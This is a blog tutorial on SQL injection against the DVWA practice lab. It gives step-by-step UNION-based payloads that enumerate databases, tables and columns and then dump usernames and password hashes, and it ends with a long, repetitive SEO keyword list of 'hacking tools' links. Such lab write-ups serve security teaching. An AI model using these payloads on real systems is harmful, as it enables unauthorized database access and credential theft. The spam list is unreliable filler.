Monday 22 January 2024

Learning Web Pentesting With DVWA Part 2: SQL Injection

In the last article Learning Web Pentesting With DVWA Part 1: Installation, you were given a glimpse of SQL injection when we installed the DVWA app. In this article we will explain what we did at the end of that article and much more.
Lets start by defining what SQL injection is, OWASP defines it as: "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
Which basically means that we can use a simple (vulnerable) input field in our web application to get information from the database of the server which hosts the web application. We can command and control (at certain times) the database of the web application or even the server.
In this article we are going to perform SQL injection attack on DVWA, so let's jump in. On the DVWA welcome page click on SQL Injection navigation link. We are presented with a page with an input field for User ID.
Now lets try to input a value like 1 in the input field. We can see a response from server telling us the firstname and surname of the user associated with User ID 1.
If we try to enter a user id which doesn't exist, we get no data back from the server. To determine whether an input field is vulnerable to SQL injection, we first start by sending a single quote (') as input. Which returns an SQL error.
We saw this in the previous article and we also talked about injection point in it. Before diving deeper into how this vulnerability can be exploited lets try to understand how this error might have occurred. Lets try to build the SQL query that the server might be trying to execute. Say the query looks something like this:
SELECT first_name, sur_name FROM users WHERE user_id = '1';
The 1 in this query is the value supplied by the user in the User ID input field. When we input a single quote in the User ID input field, the query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = '''; 
The quotes around the input provided in the User ID input field are from the server side application code. The error is due to the extra single quote present in the query. Now if we specify a comment after the single quote like this:
'-- -
or
'#
we should get no error. Now our crafted query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = ''-- -'; 
or
SELECT first_name, sur_name FROM users WHERE user_id = ''#'; 
since everything after the # or -- - are commented out, the query will ignore the extra single quote added by the server side app and whatever comes after it and will not generate any error. However the query returns nothing because we specified nothing ('') as the user_id.
After knowing how things might be working on the server side, we will start to attack the application.
First of all we will try to determine the number of columns that the query outputs because if we try a query which will output the number of columns greater or smaller than what the original query outputs then our query is going to get an error. So we will first figure out the exact number of columns that the query outputs and we will do that with the help of order by sql statement like this:
' order by 1-- - 
This MySQL server might execute the query as:
SELECT first_name, sur_name FROM users WHERE user_id = '' order by 1-- -'; 
you get the idea now.
if we don't get any error message, we will increase the number to 2 like this:
' order by 2-- - 
still no error message, lets add another:
' order by 3-- - 
and there we go we have an error message. Which tells us the number of columns that the server query selects is 2 because it erred out at 3.
Now lets use the union select SQL statement to get information about the database itself.
' union select null, version()-- - 
You should first understand what a union select statement does and only then can you understand what we are doing here. You can read about it here.
We have used null as one column since we need to match the number of columns from the server query which is two. null will act as a dummy column here which will give no output and the second column which in our case here is the version() command will output the database version. Notice the output from the application, nothing is shown for First name since we specified null for it and the maria db version will be displayed in Surname.
Now lets check who the database user is using the user() function of mariadb:
' union select null, user()-- - 
After clicking the submit button you should be able to see the user of the database in surname.

Now lets get some information about the databases in the database.
Lets determine the names of databases from INFORMATION_SCHEMA.SCHEMATA by entering following input in the User ID field:
' union select null, SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA-- - 
This lists two databases dvwa and information_schema. information_schema is the built in database. Lets look at the dvwa database.
Get table names for dvwa database from INFORMATION_SCHEMA.TABLES
' union select null, TABLE_NAME from INFORMATION_SCHEMA.TABLES-- - 
It gives a huge number of tables that are present in dvwa database. But what we are really interested in is the users table as it is most likely to contain user passwords. But first we need to determine columns of that table and we will do that by querying INFORMATION_SCHEMA.COLUMNS like this:
' union select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- - 

We can see the password column in the output now lets get those passwords:
' union select user, password from users-- - 
Of-course those are the hashes and not plain text passwords. You need to crack them.
Hope you learned something about SQL injection in this article. See you next time.

References:

1. SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
2. MySQL UNION: https://www.mysqltutorial.org/sql-union-mysql.aspx
3. Chapter 25 INFORMATION_SCHEMA Tables: https://dev.mysql.com/doc/refman/8.0/en/information-schema.html

More info


  1. Hacking Tools Usb
  2. Beginner Hacker Tools
  3. Pentest Tools Website Vulnerability
  4. Hacking Tools Hardware
  5. Pentest Tools Nmap
  6. How To Make Hacking Tools
  7. Github Hacking Tools
  8. New Hacker Tools
  9. Pentest Tools Find Subdomains
  10. Hacking Tools For Windows
  11. Pentest Tools Kali Linux
  12. Hacking Tools Download
  13. Nsa Hack Tools
  14. Hack Tools Online
  15. Hackrf Tools
  16. Hack Rom Tools
  17. Hack Tools For Games
  18. Hacking Tools And Software
  19. Hack Rom Tools
  20. Hacker Tools Apk
  21. Hack Tools 2019
  22. How To Install Pentest Tools In Ubuntu
  23. Hacking Tools For Kali Linux
  24. Hacker Tools
  25. Hack Tools Github
  26. Hacker Tools 2020
  27. Pentest Tools Tcp Port Scanner
  28. Hacker Tools Linux
  29. Best Hacking Tools 2020
  30. Hack And Tools
  31. Hack Tool Apk
  32. Blackhat Hacker Tools
  33. Hacking Tools Online
  34. Hacker Tools Free
  35. Easy Hack Tools
  36. Hacker Tools 2020
  37. Pentest Tools Apk
  38. Hacker Search Tools
  39. Hack Tool Apk No Root
  40. Hack Tools
  41. Hack Tools 2019
  42. Hacking Tools
  43. Hack Apps
  44. Easy Hack Tools
  45. Hack And Tools
  46. Hacking Tools Online
  47. Pentest Tools Free
  48. Hackrf Tools
  49. How To Make Hacking Tools
  50. Best Hacking Tools 2019
  51. Black Hat Hacker Tools
  52. Nsa Hacker Tools
  53. Hack Tools Download
  54. Hack Tools For Windows
  55. Pentest Tools Kali Linux
  56. Hacking Tools For Beginners
  57. Computer Hacker
  58. New Hacker Tools
  59. Hacking Tools For Mac
  60. Hacking Tools Online
  61. Easy Hack Tools
  62. Computer Hacker
  63. Hacking Tools Windows 10
  64. Easy Hack Tools
  65. Hack Tools For Pc
  66. Hacker Tools Free Download
  67. Hack And Tools
  68. Pentest Tools Tcp Port Scanner
  69. Pentest Tools For Windows
  70. Pentest Tools List
  71. Pentest Tools Android
  72. Pentest Tools Linux
  73. Hackrf Tools
  74. Hack Tools 2019
  75. Hacking Tools For Pc
  76. Hacker Tools Github
  77. Hacker Tools For Pc
  78. Hacking Tools Pc
  79. Pentest Tools Website
  80. Hacking App
  81. Pentest Tools For Android
  82. Pentest Box Tools Download
  83. Hacking Tools 2019
  84. Computer Hacker
  85. Hak5 Tools
  86. Best Hacking Tools 2020
  87. Hack Tools Online
  88. How To Hack
  89. Hacking Tools And Software
  90. Hack Tools For Ubuntu
  91. Hack Tools For Windows
  92. Hacker Security Tools
  93. Hack App
  94. Hackrf Tools
  95. Hacking Tools Name
  96. Pentest Tools Linux
  97. Growth Hacker Tools
  98. Hacker Tools Online
  99. Best Hacking Tools 2020
  100. Hacker Tools Online
  101. Best Pentesting Tools 2018
  102. Hackers Toolbox
  103. Pentest Tools Find Subdomains
  104. Hacking Tools And Software
  105. What Is Hacking Tools
  106. Github Hacking Tools
  107. Pentest Tools
  108. Nsa Hacker Tools
  109. Hacking Tools Mac
  110. Hacker Tools Software
  111. Hack Tool Apk No Root
  112. Hacker Tools Free Download
  113. Hack Tool Apk
  114. Hacking Tools And Software
  115. Pentest Recon Tools
  116. Hacker
  117. Hack Tools For Mac
  118. Pentest Tools For Windows
  119. Android Hack Tools Github
  120. Hacking Tools For Games
  121. Hacker Tools Online
  122. Hacking Tools For Windows
  123. Pentest Tools List
  124. Hackrf Tools
  125. Hacking Tools Usb
  126. Hack Tools Pc
  127. Pentest Tools Port Scanner
  128. Hacking Tools For Pc
  129. Hacker Tools
  130. Hacking Tools For Pc
  131. Hack Tools For Windows
  132. Hacker Tool Kit
  133. Beginner Hacker Tools
  134. Hacker Tools Free
  135. Blackhat Hacker Tools
  136. Hacking Tools Free Download
  137. Pentest Tools Framework
  138. Hacking Tools For Windows 7
  139. World No 1 Hacker Software
  140. Hack Rom Tools
  141. Hack Tools For Games
  142. Pentest Tools Kali Linux
  143. Underground Hacker Sites
  144. Pentest Tools Review
  145. Pentest Tools Framework
  146. Install Pentest Tools Ubuntu
  147. Pentest Tools For Ubuntu
  148. Hacking Tools Kit
  149. Hack Tools For Windows
  150. Pentest Tools
  151. Hacker Tools
  152. Hacking Tools For Kali Linux
  153. Bluetooth Hacking Tools Kali
  154. Pentest Tools For Ubuntu
  155. Hacking Tools Usb
  156. What Is Hacking Tools
  157. Pentest Tools For Windows
  158. How To Make Hacking Tools
  159. Hacking Tools For Windows 7
  160. Hacker Tools Apk Download
  161. Hack Apps
  162. Nsa Hack Tools Download
  163. Hacking Tools And Software
  164. Usb Pentest Tools
  165. Pentest Box Tools Download
  166. Hacking Tools For Windows
  167. Hacking Tools 2019
  168. World No 1 Hacker Software
  169. Hacking Tools Online
  170. Hack Tool Apk No Root
  171. Pentest Tools Subdomain
  172. Hacker Tools For Pc
  173. Hacking Tools Software

No comments:

Post a Comment